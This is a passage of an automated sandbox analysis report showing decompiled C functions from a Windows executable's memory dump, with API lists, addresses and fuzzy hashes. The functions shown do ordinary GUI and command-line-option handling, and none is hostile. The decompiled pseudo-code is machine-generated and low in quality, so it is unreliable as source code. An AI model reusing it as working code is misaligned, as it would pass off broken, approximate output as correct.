			}






                                                                                                                                                      0x004087f4
                                                                                                                                                      0x0040880b
                                                                                                                                                      0x00408811
                                                                                                                                                      0x0040882a
                                                                                                                                                      0x00408856

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00408811
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000003,000000FF,?,00001FFF,00000000,00000000), ref: 0040882A
                                                                                                                                                      • strlen.MSVCRT ref: 0040883C
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 0040884D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                      • Opcode ID: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
                                                                                                                                                      • Instruction ID: 1e840beb1bf30e5fccbc8f780a259ac9f9e503c3acfa46e2f16182fe3cbfa9d3
                                                                                                                                                      • Opcode Fuzzy Hash: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
                                                                                                                                                      • Instruction Fuzzy Hash: 5AF06DB340022CBEEB159B95DDC8DEB776CDB08254F0005B6B705E2082D674AE488B78
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040D4A5, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 19%
                                                                                                                                                      			E0040D4A5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040D12C(__ecx, __ecx, __eflags);
					E00405B17(_t26,  *((intOrPtr*)(__ecx + 0x10)), 4);
					L5:
					return E004015CE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E00405954(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, 0xffffff);
					SetTextColor(_a8, 0xc00000);
					return GetStockObject(0);
				}
			}







                                                                                                                                                      0x0040d4a5
                                                                                                                                                      0x0040d4ab
                                                                                                                                                      0x0040d4b1
                                                                                                                                                      0x0040d4b3
                                                                                                                                                      0x0040d4f8
                                                                                                                                                      0x0040d502
                                                                                                                                                      0x0040d509
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d514
                                                                                                                                                      0x0040d4b8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d4c7
                                                                                                                                                      0x0040d4cc
                                                                                                                                                      0x0040d4da
                                                                                                                                                      0x0040d4e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d4f0

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00405954: memset.MSVCRT ref: 00405973
                                                                                                                                                        • Part of subcall function 00405954: GetClassNameW.USER32 ref: 0040598A
                                                                                                                                                        • Part of subcall function 00405954: _wcsicmp.MSVCRT ref: 0040599C
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0040D4CC
                                                                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 0040D4DA
                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 0040D4E8
                                                                                                                                                      • GetStockObject.GDI32(00000000), ref: 0040D4F0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 764393265-0
                                                                                                                                                      • Opcode ID: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
                                                                                                                                                      • Instruction ID: 94e493e720f5362771ebb13374b41de4394e2b92cb987e20627275f4cfdde941
                                                                                                                                                      • Opcode Fuzzy Hash: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
                                                                                                                                                      • Instruction Fuzzy Hash: 8BF08132100204BBDF212FA4DD06A9A3F65EF04724F108136FA14B95F2CB75A9689E48
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00401482, Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00401482() {
				intOrPtr _t14;
				struct HWND__* _t17;
				intOrPtr _t25;
				void* _t26;

				if( *0x412394 == 2) {
					ExitProcess(1);
				}
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				_t25 =  *((intOrPtr*)(_t26 + 8));
				if( *(_t26 + 0xc) == 0x110) {
					_t17 =  *(_t25 + 0x10);
					 *(_t26 + 0xc) = _t17;
					if( *0x412ecc != 0) {
						EnumChildWindows(_t17, E00406B34, 2);
						EnumChildWindows( *(_t26 + 0xc), E00406B34, 1);
						E00405D0F( *(_t26 + 0xc), 0x400000);
					}
				}
				if( *((intOrPtr*)(_t25 + 8)) != 0) {
					SetWindowLongW( *(_t25 + 0x10), 0,  *(_t25 + 0xc));
				}
				_t14 =  *((intOrPtr*)(_t26 - 0x1c));
				return E0040E2F1(_t14);
			}







                                                                                                                                                      0x0040148c
                                                                                                                                                      0x00401490
                                                                                                                                                      0x00401490
                                                                                                                                                      0x00401496
                                                                                                                                                      0x0040149a
                                                                                                                                                      0x004014a4
                                                                                                                                                      0x004014a6
                                                                                                                                                      0x004014a9
                                                                                                                                                      0x004014b3
                                                                                                                                                      0x004014c4
                                                                                                                                                      0x004014cc
                                                                                                                                                      0x004014d6
                                                                                                                                                      0x004014dc
                                                                                                                                                      0x004014b3
                                                                                                                                                      0x004014e1
                                                                                                                                                      0x004014eb
                                                                                                                                                      0x004014eb
                                                                                                                                                      0x004014f1
                                                                                                                                                      0x004014fd

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChildEnumWindows$ExitLongProcessWindow
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2626381504-0
                                                                                                                                                      • Opcode ID: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
                                                                                                                                                      • Instruction ID: e2987c10faa884b4915a7f97f1375000f64f28bf07688916d28e14d934a6fd2a
                                                                                                                                                      • Opcode Fuzzy Hash: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
                                                                                                                                                      • Instruction Fuzzy Hash: 15011A30500209EFDB249F55ED0AB9A37A1EB00324F20C579F9657A5F0C7B96854DF18
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040C3B4, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040C3B4(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x413258 == 0) {
					memcpy(0x412668,  *__eax, 0x50);
					memcpy(0x412398,  *(_t11 + 4), 0x2cc);
					 *0x413258 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E0040C0C7, 0);
					 *0x413258 =  *0x413258 & 0x00000000;
					 *0x412394 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                                                      0x0040c3bc
                                                                                                                                                      0x0040c3be
                                                                                                                                                      0x0040c3ce
                                                                                                                                                      0x0040c3e0
                                                                                                                                                      0x0040c3ed
                                                                                                                                                      0x0040c407
                                                                                                                                                      0x0040c40d
                                                                                                                                                      0x0040c414
                                                                                                                                                      0x0040c41c
                                                                                                                                                      0x0040c3c0
                                                                                                                                                      0x0040c3c4
                                                                                                                                                      0x0040c3c4

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1386444988-0
                                                                                                                                                      • Opcode ID: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
                                                                                                                                                      • Instruction ID: 89add42b0ad0b7d68bf63fa0eb6c53c6f7d1aed99d4242a64f88595bbbc02ed0
                                                                                                                                                      • Opcode Fuzzy Hash: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
                                                                                                                                                      • Instruction Fuzzy Hash: 3EF08232650360FBE7207FA4AD46BDA7A90E744B12F20457AF644F50E1C2F915658B8C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00401712, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00401712(struct HWND__* __eax, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t12;
				struct HWND__* _t13;
				void* _t16;

				_t16 = __edi;
				_t12 = __eax;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				GetClientRect(__eax, __edi + 0x24);
				E00403F55(__edi + 0x14);
				_t13 = GetWindow(GetWindow(_t12, 5), 0);
				while(1) {
					E0040169B(_t9, _t16);
					_t11 = GetWindow(_t13, 2);
					_t13 = _t11;
					if(_t13 == 0) {
						break;
					}
					_t9 = _t13;
				}
				return _t11;
			}








                                                                                                                                                      0x00401712
                                                                                                                                                      0x00401713
                                                                                                                                                      0x0040171b
                                                                                                                                                      0x0040171e
                                                                                                                                                      0x00401727
                                                                                                                                                      0x0040173c
                                                                                                                                                      0x00401742
                                                                                                                                                      0x00401744
                                                                                                                                                      0x0040174c
                                                                                                                                                      0x0040174e
                                                                                                                                                      0x00401752
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00401740
                                                                                                                                                      0x00401740
                                                                                                                                                      0x00401756

                                                                                                                                                      APIs
                                                                                                                                                      • GetClientRect.USER32 ref: 0040171E
                                                                                                                                                        • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                      • GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                        • Part of subcall function 0040169B: GetWindowRect.USER32 ref: 004016AD
                                                                                                                                                        • Part of subcall function 0040169B: MapWindowPoints.USER32 ref: 004016BE
                                                                                                                                                        • Part of subcall function 0040169B: free.MSVCRT(?,?,?), ref: 004016DB
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rectfree$ClientPoints
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3078297017-0
                                                                                                                                                      • Opcode ID: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
                                                                                                                                                      • Instruction ID: 3c878aa69d1487aa6e46661a708a7683238dcb4edfadfd8cd86f08b3a4e73e8d
                                                                                                                                                      • Opcode Fuzzy Hash: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
                                                                                                                                                      • Instruction Fuzzy Hash: D7E0EDA170071667D6106BB59DC5A6666ACBB08341F000436B60AF7592DBB8AD148BA8
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040B31A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                      			E0040B31A(char* __ecx, void* __edx, short _a4, short _a8) {
				char _v518;
				char _v1028;
				char _v1092;
				signed int _v1100;
				char _v1172;
				char* _v1176;
				intOrPtr _v1184;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t74;
				void* _t93;
				intOrPtr _t113;
				void* _t114;
				char* _t116;
				intOrPtr _t132;

				_t114 = __edx;
				_t112 = __ecx;
				_push(_t108);
				_t116 = __ecx;
				_v1176 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t142 = _a8 - 0x9c62;
					if(_a8 == 0x9c62) {
						_t108 = _t116;
						_t74 = E0040AD95(_t116, _t142);
					}
					_t143 = _a8 - 0x9c5f;
					if(_a8 == 0x9c5f) {
						_t74 = E0040AE4D(_t74, _t112, _t114, _t116, _t143);
					}
					if(_a8 == 0x9c5e) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						_t74 = E004080C5( *((intOrPtr*)(_t116 + 0x69c)), _t112);
					}
					if(_a8 == 0x9c5c) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						E0040A3BF(_t116);
						_t74 = InvalidateRect( *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac), 0, 0);
					}
					if(_a8 == 0x9c42) {
						_t74 = DestroyWindow( *(_t116 + 0x208));
					}
					if(_a8 == 0x9c49) {
						_t108 = _t116;
						_t74 = E0040B0C2(_t116);
					}
					if(_a8 == 0x9c56) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 8) =  *( *((intOrPtr*)(_t116 + 0x698)) + 8) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						_t74 = E0040A6FF(_t116);
					}
					if(_a8 == 0x9c44) {
						_t74 = E00401BDC(_t116, 0x415);
					}
					if(_a8 == 0x9c43) {
						E0040133A( &_v1092);
						_v1092 = 0x410428;
						E00401000( &_v1028, _t112, 0x412290);
						_t108 =  &_v518;
						E00401000( &_v518, _t112, 0x4122c4);
						_t132 = _v1176;
						_push( *((intOrPtr*)(_t132 + 0x208)));
						_push( &_v1092);
						_t93 = 0x70;
						E0040152F(_t93);
						E004077CB( *((intOrPtr*)(_t132 + 0x69c)));
						_t74 = E00401357( &_v1100);
						_t116 = _t132;
					}
					_t154 = _a8 - 0x9c41;
					if(_a8 == 0x9c41) {
						_t74 = E0040AF7D(_t112, _t114, _t116, _t154);
					}
					if(_a8 != 0x9c47) {
						L27:
						__eflags = _a8 - 0x9c4f;
						if(_a8 != 0x9c4f) {
							L31:
							__eflags = _a8 - 0x9c48;
							if(__eflags == 0) {
								_t74 = E0040AF02(_t108, _t114, _t116, _t116, __eflags);
							}
							__eflags = _a8 - 0x9c45;
							if(_a8 == 0x9c45) {
								 *( *((intOrPtr*)(_t116 + 0x698)) + 4) =  *( *((intOrPtr*)(_t116 + 0x698)) + 4) ^ 0x00000001;
								__eflags = 0;
								E0040A1DC(0, _t112, _t116, 0);
								_t74 = E0040A6FF(_t116);
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 0);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 1);
							}
							__eflags = _a8 - 0x9c65;
							if(__eflags == 0) {
								_t74 = E0040B054(_t116, __eflags);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								E0040133A( &_v1172);
								_v1100 = _v1100 & 0x00000000;
								_v1172 = 0x40f7a8;
								E00403584( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e4)),  &_v1172,  *(_t116 + 0x208),  *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac));
								_t82 = _v1184;
								_t113 =  *((intOrPtr*)(_v1184 + 0x698));
								__eflags =  *((intOrPtr*)(_t113 + 0x224));
								if( *((intOrPtr*)(_t113 + 0x224)) != 0) {
									__eflags =  *((intOrPtr*)(_t113 + 0x2228)) - 2;
									if( *((intOrPtr*)(_t113 + 0x2228)) == 2) {
										E0040B00A(_t82);
									}
								}
								_v1172 = 0x40f7a8;
								_t74 = E00401357( &_v1172);
								_t116 = _v1176;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t74 = E00407E76( *((intOrPtr*)(_t116 + 0x69c)));
							}
							__eflags = _a8 - 0x9c58;
							if(_a8 == 0x9c58) {
								_t74 = E00407EBC( *((intOrPtr*)(_t116 + 0x69c)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t74 = E004097F2( *(_t116 + 0x208),  *((intOrPtr*)(_t116 + 0x69c)));
							}
							goto L52;
						}
						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
						__eflags =  *((intOrPtr*)(_t88 + 0x2e8));
						if( *((intOrPtr*)(_t88 + 0x2e8)) == 0) {
							_t74 = E004077D8(_t88, 0xffffffff, 0, 2);
							goto L31;
						}
						_push(0xf000);
						_push(0x1000);
						goto L25;
					} else {
						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
						if( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e8)) == 0) {
							_t74 = E004077D8(_t88, 0xffffffff, 2, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x2000);
						L25:
						_push(0xffffffff);
						_t74 = E004077D8(_t88);
						goto L52;
					}
				} else {
					L52:
					return _t74;
				}
			}



















                                                                                                                                                      0x0040b31a
                                                                                                                                                      0x0040b31a
                                                                                                                                                      0x0040b32b
                                                                                                                                                      0x0040b32e
                                                                                                                                                      0x0040b330
                                                                                                                                                      0x0040b334
                                                                                                                                                      0x0040b341
                                                                                                                                                      0x0040b347
                                                                                                                                                      0x0040b349
                                                                                                                                                      0x0040b34b
                                                                                                                                                      0x0040b34b
                                                                                                                                                      0x0040b350
                                                                                                                                                      0x0040b356
                                                                                                                                                      0x0040b35a
                                                                                                                                                      0x0040b35a
                                                                                                                                                      0x0040b365
                                                                                                                                                      0x0040b36d
                                                                                                                                                      0x0040b371
                                                                                                                                                      0x0040b375
                                                                                                                                                      0x0040b380
                                                                                                                                                      0x0040b380
                                                                                                                                                      0x0040b38b
                                                                                                                                                      0x0040b393
                                                                                                                                                      0x0040b397
                                                                                                                                                      0x0040b39b
                                                                                                                                                      0x0040b3a0
                                                                                                                                                      0x0040b3b3
                                                                                                                                                      0x0040b3b3
                                                                                                                                                      0x0040b3bf
                                                                                                                                                      0x0040b3c7
                                                                                                                                                      0x0040b3c7
                                                                                                                                                      0x0040b3d3
                                                                                                                                                      0x0040b3d5
                                                                                                                                                      0x0040b3d7
                                                                                                                                                      0x0040b3d7
                                                                                                                                                      0x0040b3e2
                                                                                                                                                      0x0040b3ea
                                                                                                                                                      0x0040b3ee
                                                                                                                                                      0x0040b3f2
                                                                                                                                                      0x0040b3f7
                                                                                                                                                      0x0040b3f7
                                                                                                                                                      0x0040b402
                                                                                                                                                      0x0040b40b
                                                                                                                                                      0x0040b40b
                                                                                                                                                      0x0040b416
                                                                                                                                                      0x0040b41c
                                                                                                                                                      0x0040b42d
                                                                                                                                                      0x0040b435
                                                                                                                                                      0x0040b43a
                                                                                                                                                      0x0040b446
                                                                                                                                                      0x0040b44b
                                                                                                                                                      0x0040b44f
                                                                                                                                                      0x0040b459
                                                                                                                                                      0x0040b45c
                                                                                                                                                      0x0040b45d
                                                                                                                                                      0x0040b468
                                                                                                                                                      0x0040b471
                                                                                                                                                      0x0040b476
                                                                                                                                                      0x0040b476
                                                                                                                                                      0x0040b478
                                                                                                                                                      0x0040b47e
                                                                                                                                                      0x0040b482
                                                                                                                                                      0x0040b482
                                                                                                                                                      0x0040b48d
                                                                                                                                                      0x0040b4bf
                                                                                                                                                      0x0040b4bf
                                                                                                                                                      0x0040b4c5
                                                                                                                                                      0x0040b4ed
                                                                                                                                                      0x0040b4ed
                                                                                                                                                      0x0040b4f3
                                                                                                                                                      0x0040b4f7
                                                                                                                                                      0x0040b4f7
                                                                                                                                                      0x0040b4fc
                                                                                                                                                      0x0040b502
                                                                                                                                                      0x0040b50a
                                                                                                                                                      0x0040b50e
                                                                                                                                                      0x0040b512
                                                                                                                                                      0x0040b517
                                                                                                                                                      0x0040b517
                                                                                                                                                      0x0040b51c
                                                                                                                                                      0x0040b522
                                                                                                                                                      0x0040b528
                                                                                                                                                      0x0040b528
                                                                                                                                                      0x0040b52d
                                                                                                                                                      0x0040b533
                                                                                                                                                      0x0040b539
                                                                                                                                                      0x0040b539
                                                                                                                                                      0x0040b53e
                                                                                                                                                      0x0040b544
                                                                                                                                                      0x0040b548
                                                                                                                                                      0x0040b548
                                                                                                                                                      0x0040b54d
                                                                                                                                                      0x0040b553
                                                                                                                                                      0x0040b559
                                                                                                                                                      0x0040b564
                                                                                                                                                      0x0040b56e
                                                                                                                                                      0x0040b588
                                                                                                                                                      0x0040b58d
                                                                                                                                                      0x0040b591
                                                                                                                                                      0x0040b597
                                                                                                                                                      0x0040b59e
                                                                                                                                                      0x0040b5a0
                                                                                                                                                      0x0040b5a7
                                                                                                                                                      0x0040b5a9
                                                                                                                                                      0x0040b5a9
                                                                                                                                                      0x0040b5a7
                                                                                                                                                      0x0040b5b2
                                                                                                                                                      0x0040b5b6
                                                                                                                                                      0x0040b5bb
                                                                                                                                                      0x0040b5bb
                                                                                                                                                      0x0040b5bf
                                                                                                                                                      0x0040b5c5
                                                                                                                                                      0x0040b5cd
                                                                                                                                                      0x0040b5cd
                                                                                                                                                      0x0040b5d2
                                                                                                                                                      0x0040b5d8
                                                                                                                                                      0x0040b5e0
                                                                                                                                                      0x0040b5e0
                                                                                                                                                      0x0040b5e5
                                                                                                                                                      0x0040b5eb
                                                                                                                                                      0x0040b5f9
                                                                                                                                                      0x0040b5f9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b5eb
                                                                                                                                                      0x0040b4c7
                                                                                                                                                      0x0040b4cd
                                                                                                                                                      0x0040b4d4
                                                                                                                                                      0x0040b4e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b4e8
                                                                                                                                                      0x0040b4d6
                                                                                                                                                      0x0040b4db
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b48f
                                                                                                                                                      0x0040b48f
                                                                                                                                                      0x0040b49c
                                                                                                                                                      0x0040b4ba
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b4ba
                                                                                                                                                      0x0040b49e
                                                                                                                                                      0x0040b4a3
                                                                                                                                                      0x0040b4a8
                                                                                                                                                      0x0040b4a8
                                                                                                                                                      0x0040b4aa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b4aa
                                                                                                                                                      0x0040b5fe
                                                                                                                                                      0x0040b5fe
                                                                                                                                                      0x0040b604
                                                                                                                                                      0x0040b604

                                                                                                                                                      APIs
                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3B3
                                                                                                                                                      • DestroyWindow.USER32(?), ref: 0040B3C7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DestroyInvalidateRectWindow
                                                                                                                                                      • String ID: 33@
                                                                                                                                                      • API String ID: 724544332-1541121659
                                                                                                                                                      • Opcode ID: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
                                                                                                                                                      • Instruction ID: f9cdce4f37102d27210f5083c80b5f01578b93f7cfdd6efd8ac2da961f31085b
                                                                                                                                                      • Opcode Fuzzy Hash: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
                                                                                                                                                      • Instruction Fuzzy Hash: 35714630600205AACB24BF16C845A5DB3A5EB40338F14C57AF4686B6E1D77D9D958BCE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040A4C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                      			E0040A4C2(void* __eax) {
				void* __ebx;
				void* __edi;
				short* __esi;
				void* _t24;
				int _t27;
				void* _t36;
				intOrPtr* _t43;

				_t36 = __eax;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x6c0)) + 0x30)) <= 0) {
					L11:
					E0040528C();
					 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)) + 0x3c)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)))) + 0x68))();
					_t24 = E004065C4( *((intOrPtr*)(_t36 + 0x6c0)), L"/nosort");
					__eflags = _t24 - 0xffffffff;
					if(_t24 != 0xffffffff) {
						L15:
						goto L1;
					}
					__eflags =  *0x4131d4; // 0x1
					_t43 =  *((intOrPtr*)(_t36 + 0x69c));
					if(__eflags == 0) {
						 *0x4131d8 =  *((intOrPtr*)(_t43 + 0x2d8));
						 *0x4131d4 = 1;
					}
					_t27 =  *((intOrPtr*)( *_t43 + 0x6c))();
					qsort(E00407588(_t43, 0),  *(_t43 + 0x3c), _t27, E00409EA2);
					goto L15;
				} else {
					do {
						__ecx = __esi;
						__eax = E004065EE(__eax, __esi, L"/sort");
						__eflags = __eax;
						if(__eax != 0) {
							__eax =  *((intOrPtr*)(__edi + 0x6c0));
							_t4 = __esi + 1; // 0x1
							__ecx = _t4;
							__eflags = __ecx -  *((intOrPtr*)(__eax + 0x30));
							if(__ecx >=  *((intOrPtr*)(__eax + 0x30))) {
								__ecx = 0x40f454;
							} else {
								__ecx = __eax;
							}
							__eflags =  *__ecx - 0x7e;
							__eax =  *((intOrPtr*)(__edi + 0x69c));
							if(__eflags != 0) {
							} else {
								_push(1);
								__ecx = __ecx + 2;
							}
							_push(__ecx);
							__eax = E0040A084(__eax, __eflags);
						}
						__eax =  *((intOrPtr*)(__edi + 0x6c0));
						__esi = __esi + 1;
						__eflags = __esi -  *((intOrPtr*)(__eax + 0x30));
					} while (__esi <  *((intOrPtr*)(__eax + 0x30)));
					goto L11;
				}
				L1:
				return SetCursor( *0x412390);
			}










                                                                                                                                                      0x0040a4c5
